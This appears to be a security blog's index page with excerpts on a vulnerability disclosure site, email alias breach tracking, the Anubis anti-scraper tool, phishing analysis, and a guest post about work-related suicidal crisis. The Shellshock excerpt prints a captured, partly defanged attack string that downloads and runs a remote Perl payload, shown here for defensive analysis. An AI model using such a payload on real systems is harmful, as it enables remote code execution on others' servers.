Note by nyanbinary: This post is not by me but a guest contributor, just to avoid any confusion.

Two weeks ago I had a mental breakdown, which lead to me wanting to kill myself seriously enough that my friends strongly urged me to get checked into a stationary psych ward. The process of doing so was annoying stressful and occasionally just deeply stupid but really isn't the point of writing this (tho I would like to thank the work of my friends who tirelessly tried to keep me alive and get me help).

The much more relevant point is: How did I get here? I have had my struggles with suicidal ideation in the past but i had been mostly stable since getting on HRT. The reason for the resurgence is fairly simple (and spoiled by the title): Work.

Read more…

About two years ago a few enthusiastic employees in the Security Operations team at $myJob did the right thing: They convinced management that we need a published Coordinated Vulnerability Disclosure (CVD) process (including safe haven for researchers) & a reporting path. They then set out to write the policy, comissioned a pretty basic website, and got everyone other company website to insert a link into the footer. The website, on paper, did everything right: Fully IAC, running on a centrally provided webapp producted managed by our Cloud team. No publicly reachable admin interface, every content change going through our CMS. Explicitly minimalistic. The requirements document was about 60% security requirements, mostly written by experienced pentesters & containing explicit how-tos on, for example, building a proper CSP.

Unfortunately the employees that drove the topic soon after got moved to a very different role, the topic remained with the Vulnerability Management area. Here... enthusiasm & understanding was lacking, so the site kinda... just sat there. The few actual reports that were received were handled without much urgency or care, to be honest, and I can't really fault them, it was a lot of crap for not a lot of gain & they were busy.

When I joined that team I... kinda just stole ownership of the topic because I do care. Things since then haven't been going great: I also am busy/handling too many topics, fixes are often slow, in some cases the business will do its best to just ignore or sit out pretty critical stuff, so many technical issues including us being unable to deploy any changes for months, and a complete lack of documentation making fixing anything hell (currently writing the first actual docs on this, 2 years after release, lol). But things are improving & this is one of the areas where I can truly call mine. Give it another 6 months & I am pretty certain I'll be able to call this "good enough".

What am I going to do in those 6 months? Well, stabilize deployment, iron out smaller technical issues, ... and fix the backlog of security issues that currently exist in the application.

Read more…

One of the benefits of having your own mail server is the access to an inexhaustible pool of addresses & aliases. At some point around 2018 I started to make use of this: Every service I'd sign up for would receive a separate alias. Alias were chosen pseudorandomly, essentially base64-encoded randomness, they were generated in bulk & the list was anotated with the associated service. Over the 7 years ~200 such aliases have been used.

Looking back an improvement I should have made is using email addresses more mimicing real human addresses but :shrug:.

The goal behind this was 2-fold:

• tracking of (unreported) data leaks & sales

• easy migration away from publiciced/leaked addresses

I'll be honest... it has been disappointed so far. Even with minimal filtering I have been receiving essentially no spam, no phishing on any of the addresses.

The only exception here is the email I used for Roll20, both during the 2018 and 2024 data breach. For some reason I had not rotated the email between these two so I can't quite match the three groups of phishing emails I received exactly to the specific breach but that should probably be #3 in the "goal" section - matching campaigns to breaches.

Anyway, I want to look at the three clusters for a bit.

Read more…

A few ago I wrote a post about Anubis in which I called it kinda crap but fine. Of course my brain didn't shut off after that so, uh, here are some thoughts on how one could solve some of the issues of the proof-of-work approach Anubis uses. I am sure there is prior literature & I am just reinventing the wheel but I wanna see how far I can get on my own (with the design for now, I can't program for shit...).

In the previous blogpost I highlighted the work imbalance by the approach Anubis uses - provide a proof-of-work solution once, get a cookie, do all the requests you want within a multi-day time period. Or in other words: required work does not scale with amount of requests. If you intend to keep the site useable for flesh-and-blood users crawlers don't really pay a high cost either. Unfortunately you can't really limit the amount of calls with one token either (withouth going stateful, ew)... so what if we just required constant proofs instead?

Read more…

You may have come across Anubis over the last few months - a WAF, of sorts, that uses automated challenges to filter out misbehaving web scrapers.

It's kinda crap. But that's fine & it's also kinda cool!

Read more…

Just a short one for now: Tonight I received a maximum severity alert from my SIEM, one of my internet-facing webservers received a shellshock attack! After a quick check for successful exploitation (not that I could see) I went back to sleep.

This is what was attempted (except not defanged, duh):

Timestamp: 2025-06-14T01:23:07+0200
Source IP: 104.131.118.62
Action: GET /nagios/cgi-bin/status.cgi HTTP/1.1
User Agent: () { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnZAZAZA\x22';system(\x22wget -O /tmp/gif.gif http[://]pjsn[.]hi2[.]ro/gif.gif;curl -O /tmp/gif.gif http[://]pjsn[.]hi2[.]ro/gif.gif; lwp-download -a http[://]pjsn[.]hi2[.]ro/gif.gif /tmp/gif.gif;perl /tmp/gif.gif;rm -rf /tmp/gif.gif*;exit\x22)

Or in human: Use the useragent to do the (){ :;}; thing, print something in perl I haven't fully made sense of yet, system to download a file (three different ways, depending on what downloader is available), execute the file as a perl script, then clean up behind yourself.

I just want to point out though: I think this is broken in multiple ways?

Read more…

I recently got my hands on a sample of a phishing campaign. Pretty boring one, fwiw, "just" trying to steal personal + credit card data, but still felt like doing a bit of digging. Here are some findings.

While I will share domains & url patterns I will not share full URLs as the associated pages contain personal data (esp. names) of targets. If you have a need for the full urls feel free to reach out to me.

I will not be able to share the original sample email.

tl;dr: I believe that Content Creators have a responsibility for all sponsor claims they make & repeat. If they can not do that they must not advertise outside their area of expertise.